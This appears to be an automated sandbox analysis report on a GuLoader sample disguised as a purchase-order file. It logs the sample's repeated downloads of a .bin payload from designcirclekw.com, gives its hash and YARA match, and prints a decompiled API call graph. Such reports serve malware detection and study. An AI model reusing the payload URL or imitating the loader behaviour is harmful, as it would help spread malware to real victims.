                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.85002862.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:20 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:21 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:20 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.85002962.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:22 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:23 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:22 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.85003062.215.181.250443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:24 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:25 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:24 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.85003162.215.181.2504435784C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-29 19:39:26 UTC221OUTGET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: designcirclekw.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-29 19:39:27 UTC217INHTTP/1.1 200 OK
                                                                    Date: Tue, 29 Oct 2024 19:39:26 GMT
                                                                    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/7.0.33
                                                                    X-Powered-By: PHP/7.0.33
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:15:35:20
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
                                                                    Imagebase:0x400000
                                                                    File size:918'336 bytes
                                                                    MD5 hash:E7504A48D78545EF459890B5C36B6B17
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:15:37:16
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
                                                                    Imagebase:0x400000
                                                                    File size:918'336 bytes
                                                                    MD5 hash:E7504A48D78545EF459890B5C36B6B17
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:20.5%
                                                                      Dynamic/Decrypted Code Coverage:14.4%
                                                                      Signature Coverage:21.1%
                                                                      Total number of Nodes:1461
                                                                      Total number of Limit Nodes:40
                                                                      execution_graph 4754 10001000 4757 1000101b 4754->4757 4764 100014bb 4757->4764 4759 10001020 4760 10001024 4759->4760 4761 10001027 GlobalAlloc 4759->4761 4762 100014e2 3 API calls 4760->4762 4761->4760 4763 10001019 4762->4763 4766 100014c1 4764->4766 4765 100014c7 4765->4759 4766->4765 4767 100014d3 GlobalFree 4766->4767 4767->4759 4768 4027c1 4769 402a1d 18 API calls 4768->4769 4770 4027c7 4769->4770 4771 402802 4770->4771 4772 4027eb 4770->4772 4777 4026a6 4770->4777 4774 402818 4771->4774 4775 40280c 4771->4775 4773 4027f0 4772->4773 4781 4027ff 4772->4781 4782 405d0c lstrcpynA 4773->4782 4778 405d2e 18 API calls 4774->4778 4776 402a1d 18 API calls 4775->4776 4776->4781 4778->4781 4781->4777 4783 405c6a wsprintfA 4781->4783 4782->4777 4783->4777 4784 401cc2 4785 402a1d 18 API calls 4784->4785 4786 401cd2 SetWindowLongA 4785->4786 4787 4028cf 4786->4787 4788 401a43 4789 402a1d 18 API calls 4788->4789 4790 401a49 4789->4790 4791 402a1d 18 API calls 4790->4791 4792 4019f3 4791->4792 3886 401e44 3887 402a3a 18 API calls 3886->3887 3888 401e4a 3887->3888 3889 404f25 25 API calls 3888->3889 3890 401e54 3889->3890 3902 40549d CreateProcessA 3890->3902 3892 401e5a 3893 401eb0 CloseHandle 3892->3893 3894 401e79 WaitForSingleObject 3892->3894 3895 4026a6 3892->3895 3905 4060e1 3892->3905 3893->3895 3894->3892 3896 401e87 GetExitCodeProcess 3894->3896 3898 401ea4 3896->3898 3899 401e99 3896->3899 3898->3893 3900 401ea2 3898->3900 3909 405c6a wsprintfA 3899->3909 3900->3893 3903 4054d0 CloseHandle 3902->3903 3904 4054dc 3902->3904 3903->3904 3904->3892 3906 4060fe PeekMessageA 3905->3906 3907 4060f4 DispatchMessageA 3906->3907 3908 40610e 3906->3908 3907->3906 3908->3894 3909->3900 4793 402644 4794 40264a 4793->4794 4795 402652 FindClose 4794->4795 4796 4028cf 4794->4796 4795->4796 4797 4026c6 4798 402a3a 18 API calls 4797->4798 4799 4026d4 4798->4799 4800 4026ea 4799->4800 4801 402a3a 18 API calls 4799->4801 4802 40595a 2 API calls 4800->4802 4801->4800 4803 4026f0 4802->4803 4825 40597f GetFileAttributesA CreateFileA 4803->4825 4805 4026fd 4806 4027a0 4805->4806 4807 402709 GlobalAlloc 4805->4807 4810 4027a8 DeleteFileA 4806->4810 4811 4027bb 4806->4811 4808 402722 4807->4808 4809 402797 CloseHandle 4807->4809 4826 4030a4 SetFilePointer 4808->4826 4809->4806 4810->4811 4813 402728 4814 40308e ReadFile 4813->4814 4815 402731 GlobalAlloc 4814->4815 4816 402741 4815->4816 4817 402775 4815->4817 4818 402e9f 32 API calls 4816->4818 4819 405a26 WriteFile 4817->4819 4824 40274e 4818->4824 4820 402781 GlobalFree 4819->4820 4821 402e9f 32 API calls 4820->4821 4822 402794 4821->4822 4822->4809 4823 40276c GlobalFree 4823->4817 4824->4823 4825->4805 4826->4813 3955 4022c7 3956 402a3a 18 API calls 3955->3956 3957 4022d8 3956->3957 3958 402a3a 18 API calls 3957->3958 3959 4022e1 3958->3959 3960 402a3a 18 API calls 3959->3960 3961 4022eb GetPrivateProfileStringA 3960->3961 4827 402847 4828 402a1d 18 API calls 4827->4828 4829 40284d 4828->4829 4830 40285b 4829->4830 4831 40287e 4829->4831 4833 4026a6 4829->4833 4830->4833 4835 405c6a wsprintfA 4830->4835 4832 405d2e 18 API calls 4831->4832 4831->4833 4832->4833 4835->4833 4836 40364a 4837 403655 4836->4837 4838 403659 4837->4838 4839 40365c GlobalAlloc 4837->4839 4839->4838 4137 1000270b 4138 1000275b 4137->4138 4139 1000271b VirtualProtect 4137->4139 4139->4138 4843 1000180d 4845 10001830 4843->4845 4844 10001872 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4847 10001266 2 API calls 4844->4847 4845->4844 4846 10001860 GlobalFree 4845->4846 4846->4844 4848 100019e3 GlobalFree GlobalFree 4847->4848 4580 401751 4581 402a3a 18 API calls 4580->4581 4582 401758 4581->4582 4583 401776 4582->4583 4584 40177e 4582->4584 4620 405d0c lstrcpynA 4583->4620 4621 405d0c lstrcpynA 4584->4621 4587 40177c 4591 405f77 5 API calls 4587->4591 4588 401789 4589 40577e 3 API calls 4588->4589 4590 40178f lstrcatA 4589->4590 4590->4587 4613 40179b 4591->4613 4592 4017dc 4594 40595a 2 API calls 4592->4594 4593 406010 2 API calls 4593->4613 4594->4613 4596 4017b2 CompareFileTime 4596->4613 4597 401876 4599 404f25 25 API calls 4597->4599 4598 40184d 4600 404f25 25 API calls 4598->4600 4618 401862 4598->4618 4601 401880 4599->4601 4600->4618 4602 402e9f 32 API calls 4601->4602 4604 401893 4602->4604 4603 405d0c lstrcpynA 4603->4613 4605 4018a7 SetFileTime 4604->4605 4606 4018b9 CloseHandle 4604->4606 4605->4606 4608 4018ca 4606->4608 4606->4618 4607 405d2e 18 API calls 4607->4613 4609 4018e2 4608->4609 4610 4018cf 4608->4610 4612 405d2e 18 API calls 4609->4612 4611 405d2e 18 API calls 4610->4611 4614 4018d7 lstrcatA 4611->4614 4615 4018ea 4612->4615 4613->4592 4613->4593 4613->4596 4613->4597 4613->4598 4613->4603 4613->4607 4616 405502 MessageBoxIndirectA 4613->4616 4619 40597f GetFileAttributesA CreateFileA 4613->4619 4614->4615 4617 405502 MessageBoxIndirectA 4615->4617 4616->4613 4617->4618 4619->4613 4620->4587 4621->4588 4849 401651 4850 402a3a 18 API calls 4849->4850 4851 401657 4850->4851 4852 406010 2 API calls 4851->4852 4853 40165d 4852->4853 4854 401951 4855 402a1d 18 API calls 4854->4855 4856 401958 4855->4856 4857 402a1d 18 API calls 4856->4857 4858 401962 4857->4858 4859 402a3a 18 API calls 4858->4859 4860 40196b 4859->4860 4861 40197e lstrlenA 4860->4861 4865 4019b9 4860->4865 4862 401988 4861->4862 4862->4865 4867 405d0c lstrcpynA 4862->4867 4864 4019a2 4864->4865 4866 4019af lstrlenA 4864->4866 4866->4865 4867->4864 4868 4019d2 4869 402a3a 18 API calls 4868->4869 4870 4019d9 4869->4870 4871 402a3a 18 API calls 4870->4871 4872 4019e2 4871->4872 4873 4019e9 lstrcmpiA 4872->4873 4874 4019fb lstrcmpA 4872->4874 4875 4019ef 4873->4875 4874->4875 4876 4021d2 4877 402a3a 18 API calls 4876->4877 4878 4021d8 4877->4878 4879 402a3a 18 API calls 4878->4879 4880 4021e1 4879->4880 4881 402a3a 18 API calls 4880->4881 4882 4021ea 4881->4882 4883 406010 2 API calls 4882->4883 4884 4021f3 4883->4884 4885 402204 lstrlenA lstrlenA 4884->4885 4886 4021f7 4884->4886 4888 404f25 25 API calls 4885->4888 4887 404f25 25 API calls 4886->4887 4890 4021ff 4886->4890 4887->4890 4889 402240 SHFileOperationA 4888->4889 4889->4886 4889->4890 4891 402254 4892 40225b 4891->4892 4896 40226e 4891->4896 4893 405d2e 18 API calls 4892->4893 4894 402268 4893->4894 4895 405502 MessageBoxIndirectA 4894->4895 4895->4896 4646 4014d6 4647 402a1d 18 API calls 4646->4647 4648 4014dc Sleep 4647->4648 4650 4028cf 4648->4650 4897 1000161a 4898 10001649 4897->4898 4899 10001a5d 18 API calls 4898->4899 4900 10001650 4899->4900 4901 10001663 4900->4901 4902 10001657 4900->4902 4904 1000168a 4901->4904 4905 1000166d 4901->4905 4903 10001266 2 API calls 4902->4903 4908 10001661 4903->4908 4906 10001690 4904->4906 4907 100016b4 4904->4907 4909 100014e2 3 API calls 4905->4909 4910 10001559 3 API calls 4906->4910 4911 100014e2 3 API calls 4907->4911 4912 10001672 4909->4912 4913 10001695 4910->4913 4911->4908 4914 10001559 3 API calls 4912->4914 4916 10001266 2 API calls 4913->4916 4915 10001678 4914->4915 4917 10001266 2 API calls 4915->4917 4918 1000169b GlobalFree 4916->4918 4919 1000167e GlobalFree 4917->4919 4918->4908 4920 100016af GlobalFree 4918->4920 4919->4908 4920->4908 4660 40155b 4661 401577 ShowWindow 4660->4661 4662 40157e 4660->4662 4661->4662 4663 40158c ShowWindow 4662->4663 4664 4028cf 4662->4664 4663->4664 4665 40255c 4666 402a1d 18 API calls 4665->4666 4671 402566 4666->4671 4667 4025d0 4668 4059f7 ReadFile 4668->4671 4669 4025d2 4674 405c6a wsprintfA 4669->4674 4670 4025e2 4670->4667 4673 4025f8 SetFilePointer 4670->4673 4671->4667 4671->4668 4671->4669 4671->4670 4673->4667 4674->4667 4921 40205e 4922 402a3a 18 API calls 4921->4922 4923 402065 4922->4923 4924 402a3a 18 API calls 4923->4924 4925 40206f 4924->4925 4926 402a3a 18 API calls 4925->4926 4927 402079 4926->4927 4928 402a3a 18 API calls 4927->4928 4929 402083 4928->4929 4930 402a3a 18 API calls 4929->4930 4931 40208d 4930->4931 4932 4020cc CoCreateInstance 4931->4932 4933 402a3a 18 API calls 4931->4933 4936 4020eb 4932->4936 4938 402193 4932->4938 4933->4932 4934 401423 25 API calls 4935 4021c9 4934->4935 4937 402173 MultiByteToWideChar 4936->4937 4936->4938 4937->4938 4938->4934 4938->4935 4939 40265e 4940 402664 4939->4940 4941 402668 FindNextFileA 4940->4941 4944 40267a 4940->4944 4942 4026b9 4941->4942 4941->4944 4945 405d0c lstrcpynA 4942->4945 4945->4944 4946 401cde GetDlgItem GetClientRect 4947 402a3a 18 API calls 4946->4947 4948 401d0e LoadImageA SendMessageA 4947->4948 4949 401d2c DeleteObject 4948->4949 4950 4028cf 4948->4950 4949->4950 4951 401662 4952 402a3a 18 API calls 4951->4952 4953 401669 4952->4953 4954 402a3a 18 API calls 4953->4954 4955 401672 4954->4955 4956 402a3a 18 API calls 4955->4956 4957 40167b MoveFileA 4956->4957 4958 40168e 4957->4958 4964 401687 4957->4964 4959 406010 2 API calls 4958->4959 4962 4021c9 4958->4962 4961 40169d 4959->4961 4960 401423 25 API calls 4960->4962 4961->4962 4963 405bc7 38 API calls 4961->4963 4963->4964 4964->4960 3792 405063 3793 405085 GetDlgItem GetDlgItem GetDlgItem 3792->3793 3794 40520e 3792->3794 3838 403f26 SendMessageA 3793->3838 3796 405216 GetDlgItem CreateThread CloseHandle 3794->3796 3797 40523e 3794->3797 3796->3797 3872 404ff7 OleInitialize 3796->3872 3799 40526c 3797->3799 3802 405254 ShowWindow ShowWindow 3797->3802 3803 40528d 3797->3803 3798 4050f5 3807 4050fc GetClientRect GetSystemMetrics SendMessageA SendMessageA 3798->3807 3800 405274 3799->3800 3801 4052c7 3799->3801 3804 4052a0 ShowWindow 3800->3804 3805 40527c 3800->3805 3801->3803 3814 4052d4 SendMessageA 3801->3814 3843 403f26 SendMessageA 3802->3843 3847 403f58 3803->3847 3810 4052c0 3804->3810 3811 4052b2 3804->3811 3844 403eca 3805->3844 3812 40516a 3807->3812 3813 40514e SendMessageA SendMessageA 3807->3813 3816 403eca SendMessageA 3810->3816 3861 404f25 3811->3861 3817 40517d 3812->3817 3818 40516f SendMessageA 3812->3818 3813->3812 3819 405299 3814->3819 3820 4052ed CreatePopupMenu 3814->3820 3816->3801 3839 403ef1 3817->3839 3818->3817 3821 405d2e 18 API calls 3820->3821 3823 4052fd AppendMenuA 3821->3823 3825 40531b GetWindowRect 3823->3825 3826 40532e TrackPopupMenu 3823->3826 3824 40518d 3827 405196 ShowWindow 3824->3827 3828 4051ca GetDlgItem SendMessageA 3824->3828 3825->3826 3826->3819 3829 40534a 3826->3829 3830 4051b9 3827->3830 3831 4051ac ShowWindow 3827->3831 3828->3819 3832 4051f1 SendMessageA SendMessageA 3828->3832 3833 405369 SendMessageA 3829->3833 3842 403f26 SendMessageA 3830->3842 3831->3830 3832->3819 3833->3833 3834 405386 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3833->3834 3836 4053a8 SendMessageA 3834->3836 3836->3836 3837 4053ca GlobalUnlock SetClipboardData CloseClipboard 3836->3837 3837->3819 3838->3798 3840 405d2e 18 API calls 3839->3840 3841 403efc SetDlgItemTextA 3840->3841 3841->3824 3842->3828 3843->3799 3845 403ed1 3844->3845 3846 403ed7 SendMessageA 3844->3846 3845->3846 3846->3803 3848 403f70 GetWindowLongA 3847->3848 3858 403ff9 3847->3858 3849 403f81 3848->3849 3848->3858 3850 403f90 GetSysColor 3849->3850 3851 403f93 3849->3851 3850->3851 3852 403fa3 SetBkMode 3851->3852 3853 403f99 SetTextColor 3851->3853 3854 403fc1 3852->3854 3855 403fbb GetSysColor 3852->3855 3853->3852 3856 403fd2 3854->3856 3857 403fc8 SetBkColor 3854->3857 3855->3854 3856->3858 3859 403fe5 DeleteObject 3856->3859 3860 403fec CreateBrushIndirect 3856->3860 3857->3856 3858->3819 3859->3860 3860->3858 3862 404f40 3861->3862 3870 404fe3 3861->3870 3863 404f5d lstrlenA 3862->3863 3864 405d2e 18 API calls 3862->3864 3865 404f86 3863->3865 3866 404f6b lstrlenA 3863->3866 3864->3863 3868 404f99 3865->3868 3869 404f8c SetWindowTextA 3865->3869 3867 404f7d lstrcatA 3866->3867 3866->3870 3867->3865 3868->3870 3871 404f9f SendMessageA SendMessageA SendMessageA 3868->3871 3869->3868 3870->3810 3871->3870 3879 403f3d 3872->3879 3874 405041 3875 403f3d SendMessageA 3874->3875 3876 405053 OleUninitialize 3875->3876 3877 40501a 3877->3874 3882 401389 3877->3882 3880 403f55 3879->3880 3881 403f46 SendMessageA 3879->3881 3880->3877 3881->3880 3884 401390 3882->3884 3883 4013fe 3883->3877 3884->3883 3885 4013cb MulDiv SendMessageA 3884->3885 3885->3884 3910 402364 3911 40236a 3910->3911 3912 402a3a 18 API calls 3911->3912 3913 40237c 3912->3913 3914 402a3a 18 API calls 3913->3914 3915 402386 RegCreateKeyExA 3914->3915 3916 4023b0 3915->3916 3918 4026a6 3915->3918 3917 4023c8 3916->3917 3919 402a3a 18 API calls 3916->3919 3922 402a1d 18 API calls 3917->3922 3923 4023d4 3917->3923 3921 4023c1 lstrlenA 3919->3921 3920 4023ef RegSetValueExA 3925 402405 RegCloseKey 3920->3925 3921->3917 3922->3923 3923->3920 3927 402e9f 3923->3927 3925->3918 3929 402eb5 3927->3929 3928 402ee3 3947 40308e 3928->3947 3929->3928 3952 4030a4 SetFilePointer 3929->3952 3933 403011 3933->3920 3934 402f00 GetTickCount 3934->3933 3940 402f2c 3934->3940 3935 403027 3936 403069 3935->3936 3939 40302b 3935->3939 3937 40308e ReadFile 3936->3937 3937->3933 3938 40308e ReadFile 3938->3940 3939->3933 3941 40308e ReadFile 3939->3941 3942 405a26 WriteFile 3939->3942 3940->3933 3940->3938 3943 402f82 GetTickCount 3940->3943 3944 402fa7 MulDiv wsprintfA 3940->3944 3950 405a26 WriteFile 3940->3950 3941->3939 3942->3939 3943->3940 3945 404f25 25 API calls 3944->3945 3945->3940 3953 4059f7 ReadFile 3947->3953 3951 405a44 3950->3951 3951->3940 3952->3928 3954 402eee 3953->3954 3954->3933 3954->3934 3954->3935 4965 4042e8 4966 4042f8 4965->4966 4967 40431e 4965->4967 4969 403ef1 19 API calls 4966->4969 4968 403f58 8 API calls 4967->4968 4971 40432a 4968->4971 4970 404305 SetDlgItemTextA 4969->4970 4970->4967 3994 401dea 3995 402a3a 18 API calls 3994->3995 3996 401df0 3995->3996 3997 402a3a 18 API calls 3996->3997 3998 401df9 3997->3998 3999 402a3a 18 API calls 3998->3999 4000 401e02 3999->4000 4001 402a3a 18 API calls 4000->4001 4002 401e0b 4001->4002 4006 401423 4002->4006 4005 401e3f 4007 404f25 25 API calls 4006->4007 4008 401431 ShellExecuteA 4007->4008 4008->4005 4140 4030ec SetErrorMode GetVersion 4141 403123 4140->4141 4142 403129 4140->4142 4143 4060a5 5 API calls 4141->4143 4144 406037 3 API calls 4142->4144 4143->4142 4145 40313f lstrlenA 4144->4145 4145->4142 4146 40314e 4145->4146 4147 4060a5 5 API calls 4146->4147 4148 403156 4147->4148 4149 4060a5 5 API calls 4148->4149 4150 40315d #17 OleInitialize SHGetFileInfoA 4149->4150 4228 405d0c lstrcpynA 4150->4228 4152 40319a GetCommandLineA 4229 405d0c lstrcpynA 4152->4229 4154 4031ac GetModuleHandleA 4155 4031c3 4154->4155 4156 4057a9 CharNextA 4155->4156 4157 4031d7 CharNextA 4156->4157 4165 4031e7 4157->4165 4158 4032b1 4159 4032c4 GetTempPathA 4158->4159 4230 4030bb 4159->4230 4161 4032dc 4162 4032e0 GetWindowsDirectoryA lstrcatA 4161->4162 4163 403336 DeleteFileA 4161->4163 4166 4030bb 12 API calls 4162->4166 4240 402c66 GetTickCount GetModuleFileNameA 4163->4240 4164 4057a9 CharNextA 4164->4165 4165->4158 4165->4164 4169 4032b3 4165->4169 4168 4032fc 4166->4168 4168->4163 4172 403300 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4168->4172 4324 405d0c lstrcpynA 4169->4324 4170 40334a 4173 4033e0 4170->4173 4176 4033d0 4170->4176 4180 4057a9 CharNextA 4170->4180 4175 4030bb 12 API calls 4172->4175 4327 4035b2 4173->4327 4178 40332e 4175->4178 4268 40368c 4176->4268 4178->4163 4178->4173 4181 403365 4180->4181 4188 403410 4181->4188 4189 4033ab 4181->4189 4182 403518 4185 403520 GetCurrentProcess OpenProcessToken 4182->4185 4186 40359a ExitProcess 4182->4186 4183 4033fa 4334 405502 4183->4334 4191 40356b 4185->4191 4192 40353b LookupPrivilegeValueA AdjustTokenPrivileges 4185->4192 4338 405485 4188->4338 4193 40586c 18 API calls 4189->4193 4195 4060a5 5 API calls 4191->4195 4192->4191 4196 4033b6 4193->4196 4198 403572 4195->4198 4196->4173 4325 405d0c lstrcpynA 4196->4325 4201 403587 ExitWindowsEx 4198->4201 4202 403593 4198->4202 4199 403431 lstrcatA lstrcmpiA 4199->4173 4204 40344d 4199->4204 4200 403426 lstrcatA 4200->4199 4201->4186 4201->4202 4351 40140b 4202->4351 4207 403452 4204->4207 4208 403459 4204->4208 4206 4033c5 4326 405d0c lstrcpynA 4206->4326 4341 4053eb CreateDirectoryA 4207->4341 4346 405468 CreateDirectoryA 4208->4346 4212 40345e SetCurrentDirectoryA 4214 403478 4212->4214 4215 40346d 4212->4215 4350 405d0c lstrcpynA 4214->4350 4349 405d0c lstrcpynA 4215->4349 4218 405d2e 18 API calls 4219 4034b7 DeleteFileA 4218->4219 4220 4034c4 CopyFileA 4219->4220 4225 403486 4219->4225 4220->4225 4221 40350c 4222 405bc7 38 API calls 4221->4222 4222->4173 4223 405bc7 38 API calls 4223->4225 4224 405d2e 18 API calls 4224->4225 4225->4218 4225->4221 4225->4223 4225->4224 4226 40549d 2 API calls 4225->4226 4227 4034f8 CloseHandle 4225->4227 4226->4225 4227->4225 4228->4152 4229->4154 4231 405f77 5 API calls 4230->4231 4233 4030c7 4231->4233 4232 4030d1 4232->4161 4233->4232 4234 40577e 3 API calls 4233->4234 4235 4030d9 4234->4235 4236 405468 2 API calls 4235->4236 4237 4030df 4236->4237 4354 4059ae 4237->4354 4358 40597f GetFileAttributesA CreateFileA 4240->4358 4242 402ca6 4261 402cb6 4242->4261 4359 405d0c lstrcpynA 4242->4359 4244 402ccc 4245 4057c5 2 API calls 4244->4245 4246 402cd2 4245->4246 4360 405d0c lstrcpynA 4246->4360 4248 402cdd GetFileSize 4249 402dd9 4248->4249 4267 402cf4 4248->4267 4361 402c02 4249->4361 4251 402de2 4253 402e12 GlobalAlloc 4251->4253 4251->4261 4373 4030a4 SetFilePointer 4251->4373 4252 40308e ReadFile 4252->4267 4372 4030a4 SetFilePointer 4253->4372 4256 402e45 4258 402c02 6 API calls 4256->4258 4257 402e2d 4260 402e9f 32 API calls 4257->4260 4258->4261 4259 402dfb 4262 40308e ReadFile 4259->4262 4265 402e39 4260->4265 4261->4170 4263 402e06 4262->4263 4263->4253 4263->4261 4264 402c02 6 API calls 4264->4267 4265->4261 4265->4265 4266 402e76 SetFilePointer 4265->4266 4266->4261 4267->4249 4267->4252 4267->4256 4267->4261 4267->4264 4269 4060a5 5 API calls 4268->4269 4270 4036a0 4269->4270 4271 4036a6 4270->4271 4272 4036b8 4270->4272 4383 405c6a wsprintfA 4271->4383 4273 405bf3 3 API calls 4272->4273 4274 4036e3 4273->4274 4276 403701 lstrcatA 4274->4276 4278 405bf3 3 API calls 4274->4278 4277 4036b6 4276->4277 4374 403951 4277->4374 4278->4276 4281 40586c 18 API calls 4282 403733 4281->4282 4283 4037bc 4282->4283 4285 405bf3 3 API calls 4282->4285 4284 40586c 18 API calls 4283->4284 4286 4037c2 4284->4286 4287 40375f 4285->4287 4288 4037d2 LoadImageA 4286->4288 4289 405d2e 18 API calls 4286->4289 4287->4283 4292 40377b lstrlenA 4287->4292 4297 4057a9 CharNextA 4287->4297 4290 403878 4288->4290 4291 4037f9 RegisterClassA 4288->4291 4289->4288 4295 40140b 2 API calls 4290->4295 4293 403882 4291->4293 4294 40382f SystemParametersInfoA CreateWindowExA 4291->4294 4298 403789 lstrcmpiA 4292->4298 4299 4037af 4292->4299 4293->4173 4294->4290 4296 40387e 4295->4296 4296->4293 4303 403951 19 API calls 4296->4303 4301 403779 4297->4301 4298->4299 4302 403799 GetFileAttributesA 4298->4302 4300 40577e 3 API calls 4299->4300 4304 4037b5 4300->4304 4301->4292 4305 4037a5 4302->4305 4307 40388f 4303->4307 4384 405d0c lstrcpynA 4304->4384 4305->4299 4306 4057c5 2 API calls 4305->4306 4306->4299 4309 40389b ShowWindow 4307->4309 4310 40391e 4307->4310 4312 406037 3 API calls 4309->4312 4311 404ff7 5 API calls 4310->4311 4313 403924 4311->4313 4314 4038b3 4312->4314 4315 403940 4313->4315 4316 403928 4313->4316 4317 4038c1 GetClassInfoA 4314->4317 4319 406037 3 API calls 4314->4319 4318 40140b 2 API calls 4315->4318 4316->4293 4322 40140b 2 API calls 4316->4322 4320 4038d5 GetClassInfoA RegisterClassA 4317->4320 4321 4038eb DialogBoxParamA 4317->4321 4318->4293 4319->4317 4320->4321 4323 40140b 2 API calls 4321->4323 4322->4293 4323->4293 4324->4159 4325->4206 4326->4176 4328 4035ca 4327->4328 4329 4035bc CloseHandle 4327->4329 4386 4035f7 4328->4386 4329->4328 4332 4055ae 69 API calls 4333 4033e9 OleUninitialize 4332->4333 4333->4182 4333->4183 4336 405517 4334->4336 4335 403408 ExitProcess 4336->4335 4337 40552b MessageBoxIndirectA 4336->4337 4337->4335 4339 4060a5 5 API calls 4338->4339 4340 403415 lstrcatA 4339->4340 4340->4199 4340->4200 4342 403457 4341->4342 4343 40543c GetLastError 4341->4343 4342->4212 4343->4342 4344 40544b SetFileSecurityA 4343->4344 4344->4342 4345 405461 GetLastError 4344->4345 4345->4342 4347 405478 4346->4347 4348 40547c GetLastError 4346->4348 4347->4212 4348->4347 4349->4214 4350->4225 4352 401389 2 API calls 4351->4352 4353 401420 4352->4353 4353->4186 4355 4059b9 GetTickCount GetTempFileNameA 4354->4355 4356 4059e6 4355->4356 4357 4030ea 4355->4357 4356->4355 4356->4357 4357->4161 4358->4242 4359->4244 4360->4248 4362 402c23 4361->4362 4363 402c0b 4361->4363 4366 402c33 GetTickCount 4362->4366 4367 402c2b 4362->4367 4364 402c14 DestroyWindow 4363->4364 4365 402c1b 4363->4365 4364->4365 4365->4251 4368 402c41 CreateDialogParamA ShowWindow 4366->4368 4369 402c64 4366->4369 4370 4060e1 2 API calls 4367->4370 4368->4369 4369->4251 4371 402c31 4370->4371 4371->4251 4372->4257 4373->4259 4375 403965 4374->4375 4385 405c6a wsprintfA 4375->4385 4377 4039d6 4378 405d2e 18 API calls 4377->4378 4379 4039e2 SetWindowTextA 4378->4379 4380 403711 4379->4380 4381 4039fe 4379->4381 4380->4281 4381->4380 4382 405d2e 18 API calls 4381->4382 4382->4381 4383->4277 4384->4283 4385->4377 4387 403605 4386->4387 4388 40360a FreeLibrary GlobalFree 4387->4388 4389 4035cf 